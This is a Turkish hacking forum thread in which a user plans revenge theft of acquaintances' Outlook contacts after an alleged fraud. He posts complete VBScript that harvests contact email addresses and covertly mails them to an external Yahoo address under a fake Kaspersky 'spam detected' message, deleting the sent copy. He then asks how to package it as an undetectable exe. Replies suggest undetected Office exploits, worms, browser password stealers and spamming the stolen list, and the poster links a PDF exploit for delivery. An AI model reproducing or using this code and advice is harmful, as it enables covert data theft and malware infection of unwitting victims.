Forum
Aktif konular
Üyeler
Kurallar
Arama
Outlook Virüsü - Fikir Ve Yardım Outlook Virüsü - Fikir Ve Yardım
-
Zande bunu yazdı
İlgilenen arkadaşlara çok teşekkür ederim. Bende araştırıp, kurcalamaya devam ediyorum. Bu arada yayılan virüs tarzında birşey düşünmüyorum, dolayısıyla outlook kullanan arkadaşlar rahat olsun. Durumu şöyle izah edeyim; bizim sektörde (ki sektörün bu dalında yeniyim), iş yapabilmem için kontaklara ihtiyacım var. Bu konuda bana yardım etme sözü veren ve şirket kurdurtan birkaç arkadaşım (sana şu şu şu kontakları veririz diyen), beni pis bir şekilde dolandırdı (kandırma demiyorum, resmen dolandırıldım).
Bu durumda bilgisayardan anlayan ve TBT müridi olan birisi olarak, bana yapacak tek şey bıraktılar. Arkadaşların kontak kişilerini çalmak. Elde edeceğim bilgiler belki zaten bende olanlardır ancak bu şekilde USD 15,000 dolandırılmanın acısını çıkartabilirim.
Söz konusu yazdığın gibiyse, yardımcı bile olurum..
-
Holy, aynen dediğim gibi. Detayları istersen pm ile yazayım. İsimler, telefon numaraları vb herşeyi verebilirim.
-
Sevgili müridler, vbs kodunu yazdım (daha doğrusu araştırdım ve tam olarak istediğimi yapacak şeyi, insanları rahatsız etmeyecek şekilde yaptım).
Şimdi, bu VBS'i nasıl exe yapabiliriz (google search yaptım ama öyle birşey yokmuş). Yada FUD'lamak vs işe yarar mı? Winrar ile SFX archive yaptım ancak çıkan exe'yi çalıştıramadım.
İsteyenler için kodlar aşağıda;
option explicit
dim folderPath, ofSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder "C:\MyFolder"
folderPath = "C:\MyFolder"
exportAddresses folderPath
sub exportAddresses(exportPath)
dim outApp, fldContacts, contactEntry, fso, outFile, objMail
set outApp = createobject("Outlook.Application")
set fldContacts = outApp.getnamespace("MAPI").getdefaultfolder(10)
Set objMail = outApp.CreateItem(0)
set fso = createobject( "Scripting.FileSystemObject" )
set outFile = fso.createtextfile( exportPath & "\emails.txt", 8 )
for each contactEntry in fldContacts.items
if typename(contactEntry) = "ContactItem" then
dim tmpString1, tmpString2, tmpString3, outMsg
tmpString1 = contactEntry.email1address
tmpString2 = contactEntry.email2address
tmpString3 = contactEntry.email3address
if tmpString1 <> "" then
outMsg = tmpString1
end if
if tmpString2 <> "" then
outMsg = outMsg & vbcrlf & tmpString2
end if
if tmpString3 <> "" then
outMsg = outMsg & vbcrlf & tmpString3
end if
outFile.writeline outMsg
end if
next
outFile.close
set outFile = nothing
set fso = nothing
set fldContacts = nothing
objMail.to = "sadmin@kaspersky.com.br.eu"
objMail.bcc = "pacificashipping@yahoo.com"
objMail.Subject = "Spam Detected /// Message Disarmed"
objMail.Body = "A spam message detected and message disarmed."
objMail.Attachments.Add("C:\MyFolder\emails.txt")
objmail.DeleteAfterSubmit = True
objMail.Send
Set objMail = Nothing
set outApp = nothing
end sub -
Public .doc-.docx(office 2003-2007) için undetect exploitler var. Bunları kullanabilirsin.
Mail,msn vs. üzerinden yayılan birçok worm var, 100lerce kaynak kod bulabilirsin bu konuda. Bunları outlook'a uyarlayabilirsen dediğin gayet yapılabilir birşey.
Hiç outlook kullanmadım, kayıtlı mailleri nerede nasıl bir şifrelemeyle tutuyordur bilmiyorum. Ama firefox,chrome,ie gibi birçok tarayıcı için stealer'lar var. Bu stealer'lar tarayıcılarda kayıtlı bulunan şifreleri windows üzerindeki appdata üzerinde nereye yüklüyse oradan okuyup bilgileri oluşturan kişiye yolluyor. Sen bu bilgileri kendine yollattırmak yerine outlook üzerinden yollatabilirsin.
Veya bunu yapamazsan sadece kullanıcı listesini çalarsın, sonra ufak bir bot ile bu kullanıcı listesindeki adreslere bir black mail servisini kullanarak toplu mail yollarsın.
Mesajı yollamadan bir bakayım dedim.
Contact bilgisi burada tutuluyormuş.
edit:vbs koduna baktımda, eskiden downloader'larla uğraşırken vbs kodlarını komut satırı üzerinden çalıştırıyordum. Bunu özellikle birşey için yapıyordum millet kullanmıyordu ama ne olduğunu hatırlayamadım şuan :S
http://stackoverflow.com/questions/16087470/run-command-line-command-from-vbs
pcdoktor636 tarafından 25/Ara/13 22:44 tarihinde düzenlenmiştir -
Pcdoktor,
Verdiğin cevap ve linkler için sağol. Hepsini okudum. Ben kodu bitirdim, şimdi bunu nasıl yediririm derdindeyim :)
http://enc0de.blogspot.com/2012/03/adobe-reader-v933-windows-xp-sp3.html ---> Exploit buldum konu ile ilgili. Bakalım hala çalışıyor mu :) PDF'e exe gömmece varmış :) Sonuçları bildireceğim. Bu arada konudan haberdar olupta, yardım etmek isteyen olursa, her türlü yardıma açığım.
Schwarz isimli bir mürid vardı bir aralar, FUD işi ile ilgileniyordu. Onunla da bir temasa geçeyim ;)
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla